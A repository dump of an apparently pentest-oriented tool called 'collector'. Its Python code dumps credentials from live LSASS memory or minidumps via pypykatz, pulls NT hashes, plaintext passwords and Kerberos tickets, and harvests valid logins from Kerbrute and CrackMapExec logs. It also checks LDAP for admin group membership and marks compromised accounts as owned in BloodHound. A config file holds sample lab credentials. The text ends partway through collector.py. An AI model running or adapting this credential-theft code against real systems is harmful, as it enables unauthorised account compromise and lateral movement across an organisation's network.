├── README.md ├── config.yaml ├── cmdhelper.py ├── ldap_connector.py └── collector.py /README.md: -------------------------------------------------------------------------------- 1 | # collector 2 | Utility to analyse, ingest and push out credentials from common data sources during an internal penetration test. 3 | -------------------------------------------------------------------------------- /config.yaml: -------------------------------------------------------------------------------- 1 | { 2 | 3 | 'neo4j_username': 'neo4j', 4 | 'neo4j_password': 'neo4j', 5 | 'neo4j_url' : 'bolt://localhost:7687', 6 | 'ldap_username': 'bruce.banner', 7 | 'ldap_password': 'Passw0rd!123', 8 | 'ldap_server' : '192.168.136.2', 9 | 'ldap_domain' : 'LAB.COM', 10 | 'high_value_groups' : ['Domain Admin', 'DnsAdmins','Enterprise Admins','Event Log Readers','Group Policy Creators Owners','Hyper-V Administrators','Print Operators','Protected Users','Schema Admins','Server Operators','Administrators','Backup Operators','Domain Controllers'], 11 | } 12 | -------------------------------------------------------------------------------- /cmdhelper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Author: 4 | # Tamas Jos (@skelsec) 5 | # 6 | 7 | import os 8 | import json 9 | import glob 10 | import ntpath 11 | import traceback 12 | import base64 13 | 14 | from pypykatz import logger 15 | from pypykatz.pypykatz import pypykatz 16 | from pypykatz.commons.common import UniversalEncoder 17 | from pypykatz.lsadecryptor.packages.msv.decryptor import LogonSession 18 | 19 | 20 | 21 | class LSACMDHelper: 22 | def __init__(self): 23 | self.live_keywords = ['lsa'] 24 | self.keywords = ['lsa'] 25 | 26 | def add_args(self, parser, live_parser): 27 | live_group = live_parser.add_parser('lsa', help='Get all secrets from LSASS') 28 | live_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format') 29 | live_group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed') 30 | live_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)') 31 | live_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.') 32 | live_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format') 33 | live_group.add_argument('--method', choices = ['procopen', 'handledup'], default = 'procopen', help = 'LSASS process access method') 34 | live_group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap', 'kerberos'], nargs="+", default = 'all', help = 'LSASS package to parse') 35 | 36 | 37 | group = parser.add_parser('lsa', help='Get secrets from memory dump') 38 | group.add_argument('cmd', choices=['minidump','rekall']) 39 | group.add_argument('memoryfile', help='path to the dump file') 40 | group.add_argument('-t','--timestamp_override', type=int, help='enforces msv timestamp override (0=normal, 1=anti_mimikatz)') 41 | group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format') 42 | group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed') 43 | group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)') 44 | group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.') 45 | group.add_argument('-r', '--recursive', action='store_true', help = 'Recursive parsing') 46 | group.add_argument('-d', '--directory', action='store_true', help = 'Parse all dump files in a folder') 47 | group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format') 48 | group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap', 'kerberos'], nargs="+", default = 'all', help = 'LSASS package to parse') 49 | 50 | def execute(self, args): 51 | if len(self.keywords) > 0 and args.command in self.keywords: 52 | self.run(args) 53 | 54 | if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords: 55 | self.run_live(args) 56 | 57 | def process_results(self, results, files_with_error, args): 58 | if args.outfile and args.json: 59 | with open(args.outfile, 'w') as f: 60 | json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True) 61 | 62 | elif args.outfile and args.grep: 63 | with open(args.outfile, 'w', newline = '') as f: 64 | f.write(':'.join(LogonSession.grep_header) + '\r\n') 65 | for result in results: 66 | for luid in results[result].logon_sessions: 67 | for row in results[result].logon_sessions[luid].to_grep_rows(): 68 | f.write(':'.join(row) + '\r\n') 69 | 70 | elif args.outfile: 71 | with open(args.outfile, 'w') as f: 72 | for result in results: 73 | f.write('FILE: ======== %s =======\n' % result) 74 | 75 | for luid in results[result].logon_sessions: 76 | f.write('\n'+str(results[result].logon_sessions[luid])) 77 | 78 | if len(results[result].orphaned_creds) > 0: 79 | f.write('\n== Orphaned credentials ==\n') 80 | for cred in results[result].orphaned_creds: 81 | f.write(str(cred)) 82 | 83 | if len(files_with_error) > 0: 84 | f.write('\n== Failed to parse these files:\n') 85 | for filename in files_with_error: 86 | f.write('%s\n' % filename) 87 | 88 | elif args.json: 89 | print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True)) 90 | 91 | elif args.grep: 92 | if hasattr(args, 'directory') and args.directory is not None: 93 | print(':'.join(['filename'] + LogonSession.grep_header)) 94 | else: 95 | print(':'.join(LogonSession.grep_header)) 96 | for result in results: 97 | for luid in results[result].logon_sessions: 98 | for row in results[result].logon_sessions[luid].to_grep_rows(): 99 | if hasattr(args, 'directory') and args.directory is not None: 100 | row = [result] + row 101 | print(':'.join(row)) 102 | for cred in results[result].orphaned_creds: 103 | t = cred.to_dict() 104 | if t['credtype'] != 'dpapi': 105 | if t['password'] is not None: 106 | x = [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])] 107 | if hasattr(args, 'directory') and args.directory is not None: 108 | x = [result] + x 109 | print(':'.join(x)) 110 | else: 111 | t = cred.to_dict() 112 | x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), ''] 113 | if hasattr(args, 'directory') and args.directory is not None: 114 | x = [result] + x 115 | print(':'.join(x)) 116 | 117 | for pkg, err in results[result].errors: 118 | err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__)) 119 | err_str = base64.b64encode(err_str.encode()).decode() 120 | x = [pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str] 121 | if hasattr(args, 'directory') and args.directory is not None: 122 | x = [result] + x 123 | print(':'.join(x) + '\r\n') 124 | else: 125 | for result in results: 126 | print('FILE: ======== %s =======' % result) 127 | if isinstance(results[result], str): 128 | print(results[result]) 129 | else: 130 | for luid in results[result].logon_sessions: 131 | print(str(results[result].logon_sessions[luid])) 132 | 133 | if len(results[result].orphaned_creds) > 0: 134 | print('== Orphaned credentials ==') 135 | for cred in results[result].orphaned_creds: 136 | print(str(cred)) 137 | 138 | if len(results[result].errors) > 0: 139 | print('== Errors ==') 140 | for pkg, err in results[result].errors: 141 | err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__)) 142 | logger.debug(err_str) 143 | err_str = base64.b64encode(err_str.encode()).decode() 144 | print('%s %s' % (pkg+'_exception_please_report',err_str)) 145 | 146 | 147 | 148 | if len(files_with_error) > 0: 149 | print('\n==== Parsing errors:') 150 | for filename in files_with_error: 151 | print(filename) 152 | 153 | 154 | if args.kerberos_dir: 155 | dir = os.path.abspath(args.kerberos_dir) 156 | logger.info('Writing kerberos tickets to %s' % dir) 157 | for filename in results: 158 | base_filename = ntpath.basename(filename) 159 | ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions 160 | results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename)) 161 | for luid in results[filename].logon_sessions: 162 | for kcred in results[filename].logon_sessions[luid].kerberos_creds: 163 | for ticket in kcred.tickets: 164 | ticket.to_kirbi(dir) 165 | 166 | for cred in results[filename].orphaned_creds: 167 | if cred.credtype == 'kerberos': 168 | for ticket in cred.tickets: 169 | ticket.to_kirbi(dir) 170 | 171 | def run_live(self, args): 172 | files_with_error = [] 173 | results = {} 174 | if args.module == 'lsa': 175 | filename = 'live' 176 | try: 177 | if args.kerberos_dir is not None and 'all' not in args.packages: 178 | args.packages.append('ktickets') 179 | if args.method == 'procopen': 180 | mimi = pypykatz.go_live(packages=args.packages) 181 | elif args.method == 'handledup': 182 | mimi = pypykatz.go_handledup(packages=args.packages) 183 | if mimi is None: 184 | raise Exception('HANDLEDUP failed to bring any results!') 185 | results['live'] = mimi 186 | if args.halt_on_error == True and len(mimi.errors) > 0: 187 | raise Exception('Error in modules!') 188 | except Exception as e: 189 | files_with_error.append(filename) 190 | if args.halt_on_error == True: 191 | raise e 192 | else: 193 | print('Exception while dumping LSA credentials from memory.') 194 | traceback.print_exc() 195 | pass 196 | 197 | self.process_results(results, files_with_error,args) 198 | 199 | def run(self, args): 200 | files_with_error = [] 201 | results = {} 202 | ###### Rekall 203 | if args.cmd == 'rekall': 204 | if args.kerberos_dir is not None and 'all' not in args.packages: 205 | args.packages.append('ktickets') 206 | mimi = pypykatz.parse_memory_dump_rekall(args.memoryfile, args.timestamp_override, packages=args.packages) 207 | results['rekall'] = mimi 208 | 209 | ###### Minidump 210 | elif args.cmd == 'minidump': 211 | if args.directory: 212 | dir_fullpath = os.path.abspath(args.memoryfile) 213 | file_pattern = '*.dmp' 214 | if args.recursive == True: 215 | globdata = os.path.join(dir_fullpath, '**', file_pattern) 216 | else: 217 | globdata = os.path.join(dir_fullpath, file_pattern) 218 | 219 | logger.info('Parsing folder %s' % dir_fullpath) 220 | for filename in glob.glob(globdata, recursive=args.recursive): 221 | logger.info('Parsing file %s' % filename) 222 | try: 223 | if args.kerberos_dir is not None and 'all' not in args.packages: 224 | args.packages.append('ktickets') 225 | mimi = pypykatz.parse_minidump_file(filename, packages=args.packages) 226 | results[filename] = mimi 227 | if args.halt_on_error == True and len(mimi.errors) > 0: 228 | raise Exception('Error in modules!') 229 | except Exception as e: 230 | files_with_error.append(filename) 231 | logger.exception('Error parsing file %s ' % filename) 232 | if args.halt_on_error == True: 233 | raise e 234 | else: 235 | pass 236 | 237 | else: 238 | logger.info('Parsing file %s' % args.memoryfile) 239 | try: 240 | if args.kerberos_dir is not None and 'all' not in args.packages: 241 | args.packages.append('ktickets') 242 | mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages) 243 | results[args.memoryfile] = mimi 244 | if args.halt_on_error == True and len(mimi.errors) > 0: 245 | raise Exception('Error in modules!') 246 | except Exception as e: 247 | logger.exception('Error while parsing file %s' % args.memoryfile) 248 | if args.halt_on_error == True: 249 | raise e 250 | else: 251 | traceback.print_exc() 252 | 253 | self.process_results(results, files_with_error, args) -------------------------------------------------------------------------------- /ldap_connector.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import logging 4 | import queue 5 | import re 6 | import threading 7 | import time 8 | 9 | import ldap3 10 | import OpenSSL 11 | from impacket.ldap import ldap 12 | 13 | import utilities 14 | 15 | """ 16 | WARNING: 17 | If you try to borrow this code, please be aware: 18 | Neither LDAP connector is thread safe! 19 | Impacket library may not be thread safe, more research is needed. 20 | LDAP3 must be instantiate with special parameters to be thread safe (which this library is not doing right now): 21 | https://ldap3.readthedocs.io/en/latest/index.html?highlight=thread#welcome-to-ldap3-s-documentation 22 | """ 23 | 24 | 25 | class LDAP3Connector: 26 | basedn = None 27 | conn = None 28 | servers = [] 29 | _isconnected = False 30 | 31 | def __init__(self, server, sec_level, domain, username, password, basedn=None, pagesize=10, maxrecord=100, delay=0): 32 | self.domain = domain 33 | self.username = username 34 | self.password = password 35 | self.basedn = basedn 36 | self.pagesize = pagesize 37 | self.maxrecord = maxrecord 38 | self.delay = delay 39 | self.sec_level = sec_level 40 | self.server = None 41 | 42 | # Set Encoding to UTF-8 43 | ldap3.set_config_parameter("DEFAULT_ENCODING", "utf-8") 44 | 45 | # Shuffle servers if multiple provided to distribute DC load 46 | 47 | if sec_level == 3: 48 | self.server = ldap3.Server(server, port=636, get_info=ldap3.ALL, use_ssl=True) 49 | else: 50 | self.server = ldap3.Server(server, port=389, get_info=ldap3.ALL) 51 | 52 | self.conn = ldap3.Connection( 53 | self.server, 54 | user="{0}\\{1}".format(self.domain, self.username), 55 | password=self.password, 56 | authentication=ldap3.NTLM, 57 | read_only=True, 58 | ) 59 | 60 | if sec_level == 2: 61 | try: 62 | self.conn.start_tls() 63 | except ldap3.core.exceptions.LDAPStartTLSError: 64 | pass 65 | 66 | if self.conn.bind(): 67 | if not self.basedn: 68 | self.basedn = self.conn.server.info.other["defaultNamingContext"][0] 69 | 70 | if not self.basedn: 71 | self.basedn = utilities.attempt_to_derive_basedn( 72 | server.ip, self.domain, self.username, self.password 73 | ) 74 | 75 | if not self.basedn: 76 | raise Exception("Unable to derive baseDN") 77 | else: 78 | raise Exception("Unable to connect to server") 79 | 80 | def search(self, search, attributes): 81 | if not attributes: 82 | attributes = ldap3.ALL_ATTRIBUTES 83 | 84 | self.conn.search( 85 | self.basedn, 86 | search, 87 | search_scope=ldap3.SUBTREE, 88 | attributes=attributes, 89 | paged_size=self.pagesize, 90 | ) 91 | 92 | cookie = self.conn.result["controls"]["1.2.840.113556.1.4.319"]["value"][ 93 | "cookie" 94 | ] 95 | 96 | looptrack = None 97 | 98 | while True: 99 | for raw_entry in self.conn.entries: 100 | if looptrack == "": 101 | looptrack = raw_entry["cn"] 102 | elif looptrack == raw_entry["cn"]: 103 | # In spite of cookie paging, AD starts looping forever so we detect loop and break 104 | cookie = False 105 | break 106 | 107 | # Impacket library returns strings for everything, so we do that here to ensure similar behavior to ldap3 108 | 109 | entry = {} 110 | keys = [] 111 | 112 | if isinstance(attributes, list): 113 | keys = attributes 114 | else: 115 | keys = list(raw_entry.entry_attributes_as_dict) 116 | 117 | for key in keys: 118 | if key in raw_entry: 119 | if len(raw_entry[key]) == 0: 120 | entry[key.lower()] = "" 121 | elif len(raw_entry[key]) > 1: # This is a list 122 | entry[key.lower()] = [str(x) for x in raw_entry[key]] 123 | else: 124 | entry[key.lower()] = str(raw_entry[key]) 125 | 126 | yield entry 127 | 128 | if len(cookie) == 0: 129 | break 130 | 131 | self.conn.search( 132 | self.basedn, 133 | search, 134 | search_scope=ldap3.SUBTREE, 135 | attributes=attributes, 136 | paged_size=self.pagesize, 137 | paged_cookie=cookie, 138 | ) 139 | 140 | cookie = self.conn.result["controls"]["1.2.840.113556.1.4.319"]["value"][ 141 | "cookie" 142 | ] 143 | 144 | def __enter__(self): 145 | return self 146 | 147 | def __exit__(self, exc_type, exc_val, exc_tb): 148 | try: 149 | self.conn.close() 150 | except Exception: 151 | pass 152 | 153 | 154 | class _ImpacketRecordHandler: 155 | """ 156 | Class exists to basically "curry" the Impacket entry handler callback to pass a per-thread 157 | queue in the class context. This should make this particular piece thread safe and make 158 | exceptions less devastating. 159 | """ 160 | 161 | thread_queue = None 162 | attributes = [] 163 | 164 | def __init__(self, thread_queue, attributes, delay): 165 | self.thread_queue = thread_queue 166 | self.attributes = attributes 167 | self.delay = delay 168 | 169 | def handle_record(self, item): 170 | # Make sure all searched attributes are included in result 171 | entry = {k: "" for k in self.attributes} 172 | 173 | try: 174 | for attribute in item["attributes"]: 175 | name = str(attribute["type"]).lower() 176 | data = None 177 | 178 | if name in ["objectguid"]: 179 | # Reformating to match ldap3 format: 180 | data = "".join("%02x" % b for b in attribute["vals"][0].asOctets()) 181 | data = "{{{0}-{1}-{2}-{3}-{4}}}".format( 182 | "".join(utilities.splitn(data[0:8], 2)[::-1]), 183 | "".join(utilities.splitn(data[8:12], 2)[::-1]), 184 | "".join(utilities.splitn(data[12:16], 2)[::-1]), 185 | data[16:20], 186 | data[20:], 187 | ) 188 | elif name == "objectsid": 189 | data = utilities.binary_to_sid(attribute["vals"][0]) 190 | else: 191 | data = [] 192 | 193 | for item in attribute["vals"]: 194 | try: 195 | data.append(item.asOctets().decode("utf-8")) 196 | except UnicodeDecodeError: 197 | data.append("".join("\\x%02x" % b for b in item.asOctets())) 198 | 199 | 200 | for i in range(len(data)): 201 | if re.match(r"^\d{14}\.\dZ$", data[i]): 202 | data[i] = datetime.datetime.strptime(data[i][:-1], '%Y%m%d%H%M%S.%f').replace(tzinfo=datetime.timezone.utc) 203 | data[i] = data[i].strftime('%Y-%m-%d %H:%M:%S+00:00') 204 | elif re.search(r"^\d{18,19}$", data[i]): 205 | try: 206 | data[i] = utilities.ldap_to_unix_timestamp(data[i]).strftime("%Y-%m-%d %H:%M:%S+00:00") 207 | except Exception: 208 | pass 209 | 210 | if len(data) == 0: 211 | data = "" 212 | elif len(data) == 1: 213 | data = data[0] 214 | 215 | entry[name] = data 216 | 217 | self.thread_queue.put(entry) 218 | 219 | time.sleep(self.delay) 220 | except TypeError: 221 | pass 222 | except Exception: 223 | logging.exception() 224 | pass 225 | 226 | 227 | class ImpacketLDAPConnector: 228 | basedn = None 229 | conn = None 230 | servers = [] 231 | attributes = [] 232 | _isconnected = False 233 | 234 | def __init__(self, server, sec_level, domain, username, password, basedn=None, pagesize=10, maxrecord=100, delay=0): 235 | self.domain = domain 236 | self.username = username 237 | self.password = password 238 | self.basedn = basedn 239 | self.pagesize = pagesize 240 | self.maxrecord = maxrecord 241 | self.delay = delay 242 | self.server = None 243 | 244 | if sec_level == 3: 245 | self.server = "ldaps://{}".format(server) 246 | else: 247 | self.server = "ldap://{}".format(server) 248 | 249 | if not self.basedn: 250 | self.basedn = utilities.attempt_to_derive_basedn( 251 | server.split("/")[-1], self.domain, self.username, self.password 252 | ) 253 | 254 | if not self.basedn: 255 | raise Exception("Unable to derive baseDN") 256 | 257 | self.conn = ldap.LDAPConnection(self.server, self.basedn, None) 258 | self.conn.login(self.username, self.password, self.domain) 259 | 260 | def search(self, search, attributes): 261 | try: 262 | """ 263 | Impacket either returns all results or calls a callback method for every result. 264 | We wrap this in a thread and queue so that we can slow it down and bunch our results 265 | as we want. We do need to make sure that our processing is fast enough that the LDAP 266 | connection does not time out. 267 | """ 268 | 269 | sc = ldap.SimplePagedResultsControl(size=self.pagesize) 270 | 271 | thread_queue = queue.Queue(self.pagesize) 272 | 273 | record_handler = _ImpacketRecordHandler(thread_queue, attributes, self.delay) 274 | 275 | self.attributes = attributes 276 | 277 | t = threading.Thread( 278 | target=self.conn.search, 279 | kwargs={ 280 | "searchFilter": search, 281 | "attributes": attributes, 282 | "sizeLimit": self.maxrecord, 283 | "searchControls": [sc], 284 | "perRecordCallback": record_handler.handle_record, 285 | }, 286 | ) 287 | t.daemon = True 288 | t.start() 289 | 290 | while True: 291 | try: 292 | yield thread_queue.get(block=False) 293 | 294 | except queue.Empty: 295 | # If nothing in queue, and the ldap query has died or finished we can exit 296 | if not t.is_alive(): 297 | break 298 | 299 | except ldap.LDAPSearchError as ex: 300 | raise ex 301 | 302 | except Exception as ex: 303 | raise ex 304 | 305 | def __enter__(self): 306 | return self 307 | 308 | def __exit__(self, exc_type, exc_val, exc_tb): 309 | try: 310 | self.conn.close() 311 | except Exception: 312 | pass -------------------------------------------------------------------------------- /collector.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import sys 4 | import argparse 5 | import re 6 | from collections import OrderedDict 7 | import yaml 8 | import json 9 | from utilities import escape_ldap 10 | from ldap_connector import LDAP3Connector 11 | from ldap_connector import ImpacketLDAPConnector 12 | import colorama 13 | from colorama import Fore, Style 14 | from os import path 15 | import glob 16 | import neo4j 17 | import logging 18 | from time import time, sleep 19 | 20 | #Steal from pypykatz 21 | 22 | 23 | from pypykatz import logger as pypylogger 24 | from pypykatz.pypykatz import pypykatz 25 | from pypykatz.commons.common import UniversalEncoder 26 | from pypykatz.lsadecryptor.packages.msv.decryptor import LogonSession 27 | from pypykatz.commons.common import KatzSystemInfo 28 | from minidump.minidumpfile import MinidumpFile 29 | 30 | from io import StringIO 31 | from copy import copy 32 | from logging import Formatter 33 | 34 | 35 | 36 | 37 | 38 | 39 | #Stolen from https://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output 40 | MAPPING = { 41 | 'DEBUG' : 32, # green 42 | 'INFO' : 36, # cyan 43 | 'WARNING' : 33, # yellow 44 | 'ERROR' : 31, # red 45 | 'CRITICAL': 41, # white on red bg 46 | } 47 | 48 | PREFIX = '\033[' 49 | SUFFIX = '\033[0m' 50 | 51 | class ColoredFormatter(Formatter): 52 | 53 | def __init__(self, patern): 54 | Formatter.__init__(self, patern) 55 | 56 | def format(self, record): 57 | colored_record = copy(record) 58 | levelname = colored_record.levelname 59 | seq = MAPPING.get(levelname, 37) # default white 60 | colored_levelname = ('{0}{1}m{2}{3}').format(PREFIX, seq, levelname, SUFFIX) 61 | 62 | colored_record.levelname = colored_levelname 63 | 64 | colored_record.msg = ('{0}{1}m{2}{3}').format(PREFIX, seq, colored_record.getMessage(), SUFFIX) 65 | 66 | return Formatter.format(self, colored_record) 67 | 68 | 69 | 70 | class StringBuilder: 71 | _file_str = None 72 | 73 | def __init__(self): 74 | self._file_str = StringIO() 75 | 76 | def Add(self, str): 77 | self._file_str.write(str + "\n") 78 | 79 | def __str__(self): 80 | return self._file_str.getvalue() 81 | 82 | 83 | ##Stolen from https://github.com/trustedsec/CrackHound/blob/8f6274f1142c619716649e76a309b37a839cb46c/crackhound.py#L83 84 | def update_database( 85 | compromised_users, url, username, password): 86 | try: 87 | 88 | try: 89 | db_conn = neo4j.GraphDatabase.driver( 90 | url, auth=(username, password), encrypted=False 91 | ) 92 | except Exception: 93 | mainlog.error("Couldn't connect to Neo4j database.") 94 | else: 95 | mainlog.info("Neo4j Connection success!") 96 | 97 | markedCount = 0 98 | for user in compromised_users: 99 | try: 100 | with db_conn.session() as session: 101 | if '$' in user['username']: 102 | tx = session.run( 103 | 'match (u:Computer) where u.name STARTS WITH "{0}" set u.owned=True return u.name'.format( 104 | user["username"].upper().replace('$','.') 105 | ) 106 | ) 107 | 108 | if tx.single()[0] is not None: 109 | markedCount += 1 110 | 111 | else: 112 | tx = session.run( 113 | 'match (u:User) where u.name STARTS WITH "{0}@" set u.owned=True return u.name'.format( 114 | user["username"].upper() 115 | ) 116 | ) 117 | 118 | if tx.single()[0] is not None: 119 | markedCount += 1 120 | 121 | if(args.verbose): 122 | mainlog.debug("{0} successfully marked as owned!".format(user['username'])) 123 | 124 | 125 | 126 | except Exception as e: 127 | if(args.verbose): 128 | mainlog.error(f'Error marking {user["username"]} as owned => {e}') 129 | 130 | continue 131 | session.close() 132 | 133 | mainlog.debug(f"Successfully marked {markedCount} bloodhound objects as owned!") 134 | except Exception as e: 135 | mainlog.error(f"An error occured {e}") 136 | 137 | 138 | 139 | def isKebruteLog(inputData): 140 | # Check if it contains: Using KDC(s): and/or 'Done! Tested' 141 | result = re.search(r"Using KDC\(s\)((.|\n)*)Done! Tested.{0,40}logins.{0,40}seconds",inputData) 142 | if result == None: 143 | return False 144 | return True 145 | 146 | def isCmeRawLog(logData): 147 | #Remove some colors 148 | regex = re.compile(r"\x1b\[[0-9;]*m") 149 | inputData = regex.sub("", logData) 150 | 151 | 152 | #Search for CME "pwned" 153 | result = re.search(r"[a-zA-Z0-9\-\.]{1,15}\\[a-zA-Z][a-zA-Z0-9\-\.]{0,61}[a-zA-Z]:.{1,127} \(Pwn3d!\)(\n|\r|$)",inputData) 154 | if result != None: 155 | return True 156 | 157 | #Search for NTHash creds 158 | result = re.search(r"[a-zA-Z0-9\-\.]{1,15}\\[a-zA-Z][a-zA-Z0-9\-\.]{0,61}[a-zA-Z]:[a-f0-9]{32}",inputData) 159 | if result != None: 160 | return True 161 | 162 | #Search for plaintext creds 163 | result = re.search(r"[a-zA-Z0-9\-\.]{1,15}\\[a-zA-Z][a-zA-Z0-9\-\.]{0,61}[a-zA-Z]:.{1,127}(\n|\r|$)",inputData) 164 | if result != None: 165 | return True 166 | 167 | 168 | 169 | #This attempts to read a config 170 | def get_config(configPath): 171 | try: 172 | with open('config.yaml') as f: 173 | config = yaml.load(f, Loader=yaml.FullLoader) 174 | mainlog.info("Config found and parsed!") 175 | return config 176 | except: 177 | mainlog.error("Failed to read config!") 178 | 179 | def parseFile(filePath, yamlConfig): 180 | compromised_users = [] 181 | lsassDump = False 182 | #Get the config 183 | #yamlConfig = get_config('') 184 | import magic 185 | 186 | if 'Mini DuMP crash report' in magic.from_file(filePath): 187 | inputDataRaw= '' 188 | mainlog.info("Parsing LSASS dump") 189 | results = {} 190 | lsassOutputBuilder = StringBuilder() 191 | minidump = MinidumpFile.parse(filePath) 192 | reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=10*1024) 193 | sysinfo = KatzSystemInfo.from_minidump(minidump) 194 | mimi = pypykatz(reader, sysinfo) 195 | mimi.start(['all']) 196 | results[filePath] = mimi 197 | lsassDump = True 198 | lsassOutputBuilder.Add(':'.join(LogonSession.grep_header)) 199 | for result in results: 200 | for luid in results[result].logon_sessions: 201 | for row in results[result].logon_sessions[luid].to_grep_rows(): 202 | if hasattr(args, 'directory') and args.directory is not None: 203 | row = [result] + row 204 | lsassOutputBuilder.Add(':'.join(row)) 205 | for cred in results[result].orphaned_creds: 206 | t = cred.to_dict() 207 | if t['credtype'] != 'dpapi': 208 | if t['password'] is not None: 209 | x = [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])] 210 | if hasattr(args, 'directory') and args.directory is not None: 211 | x = [result] + x 212 | lsassOutputBuilder.Add(':'.join(x)) 213 | else: 214 | t = cred.to_dict() 215 | x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), ''] 216 | if hasattr(args, 'directory') and args.directory is not None: 217 | x = [result] + x 218 | lsassOutputBuilder.Add(':'.join(x)) 219 | for pkg, err in results[result].errors: 220 | err_str = str(err) 221 | #err_str = base64.b64encode(err_str.encode()).decode() 222 | x = [pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str] 223 | if hasattr(args, 'directory') and args.directory is not None: 224 | x = [result] + x 225 | lsassOutputBuilder.Add(':'.join(x) + '\r\n') 226 | rawCreds = lsassOutputBuilder 227 | validCreds = re.findall(r"msv:[a-zA-Z0-9\-\.]{1,15}.*[a-f0-9]{32}.*[a-f0-9]{32}",str(rawCreds)) 228 | 229 | for validLogin in validCreds: 230 | 231 | if validLogin.split(':')[2] not in [d['username'] for d in compromised_users]: 232 | 233 | user_dict = {} 234 | user_dict["username"] = validLogin.split(':')[2] 235 | user_dict["domain"] = validLogin.split(':')[1] 236 | user_dict["password"] = validLogin.split(':')[3].rstrip() 237 | 238 | compromised_users.append(user_dict) 239 | else: 240 | try: 241 | inputFile = open(filePath,"r+") 242 | inputDataRaw = inputFile.read() 243 | 244 | #Try to determn what kinda of logs this is 245 | if isKebruteLog(inputDataRaw) and not lsassDump: 246 | mainlog.info("Kerbrute log identified!") 247 | #Remove some colors 248 | regex = re.compile(r"\x1b\[[0-9;]*m") 249 | inputData = regex.sub("", inputDataRaw) 250 | #Let's pull out all the valid creds 251 | validCreds = re.findall(r"\[\+\] VALID LOGIN:.{1,20}@[a-zA-Z0-9\-\.]{0,15}:.{1,127}",inputData) 252 | for validLogin in validCreds: 253 | if validLogin[:-1].split(":")[1].split('@')[0].lstrip() not in [d['username'] for d in compromised_users]: 254 | user_dict = {} 255 | user_dict["username"] = validLogin[:-1].split(":")[1].split('@')[0].lstrip() 256 | user_dict["domain"] =validLogin[:-1].split(":")[1].split('@')[1].lstrip().upper() 257 | user_dict["password"] = validLogin[:-1].split(":")[2].lstrip().rstrip() 258 | 259 | compromised_users.append(user_dict) 260 | 261 | if isCmeRawLog(inputDataRaw) and not lsassDump: 262 | mainlog.info("Raw CME logs identified!") 263 | #Remove some colors 264 | regex = re.compile(r"\x1b\[[0-9;]*m") 265 | inputData = regex.sub("", inputDataRaw) 266 | ##Find all valid creds with NTHashes 267 | ntHashCredsRegex = r"[a-zA-Z0-9\-\.]{1,15}\\[a-zA-Z][a-zA-Z0-9\-\.]{0,61}[a-zA-Z]:[a-f0-9]{32}" 268 | validCredsNtHashes = re.findall(ntHashCredsRegex, inputData) 269 | ##Find all the domain names 270 | plaintextCredsRegex = r'(?!.*:[a-f0-9]{32}|.*\(Pwn3d!\))[a-zA-Z0-9\-\.]{1,15}\\[a-zA-Z][a-zA-Z0-9\-\.]{0,61}[a-zA-Z]:.{1,127}' 271 | validCredsPlaintext = re.findall(plaintextCredsRegex, inputData) 272 | allValidCreds = validCredsNtHashes + validCredsPlaintext 273 | #print(allValidCreds) 274 | for validLogin in allValidCreds: 275 | 276 | if validLogin.split(':')[0].split('\\')[1].rstrip() not in [d['username'] for d in compromised_users]: 277 | user_dict = {} 278 | user_dict["username"] = validLogin.split(':')[0].split('\\')[1].rstrip() 279 | user_dict["domain"] = validLogin.split('\\')[0].rstrip() 280 | user_dict["password"] = validLogin.split(':')[1].rstrip() 281 | compromised_users.append(user_dict) 282 | except Exception as ex: 283 | mainlog.warning(f'Failed to read file: {ex}') 284 | return compromised_users 285 | 286 | 287 | def cmdline_args(): 288 | 289 | p = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) 290 | 291 | p.add_argument("-i", "--inputData", help="Input file(s) or data", nargs='+') 292 | p.add_argument("--cme", action="store_true",help="fetch data from CrackMapExec logs") 293 | 294 | p.add_argument("--ldap", action="store_true",help="Query LDAP for compromised users group membership") 295 | 296 | p.add_argument("--blood", action="store_true",help="Marked owned accounts as owned in Bloodhound (Neo4j)") 297 | 298 | p.add_argument("--watch",help="Continually watch the data provided for changes (default every 10 seconds)", nargs='?', const=10, type=int) 299 | 300 | p.add_argument("-v","--verbose", action="store_true",help="Show verbose output") 301 | 302 | return(p.parse_args()) 303 | 304 | # Stolen from https://www.geeksforgeeks.org/python-find-most-frequent-element-in-a-list/ 305 | # Program to find most frequent 306 | # element in a list 307 | def most_frequent(List): 308 | return max(set(List), key = List.count) 309 | 310 | 311 | 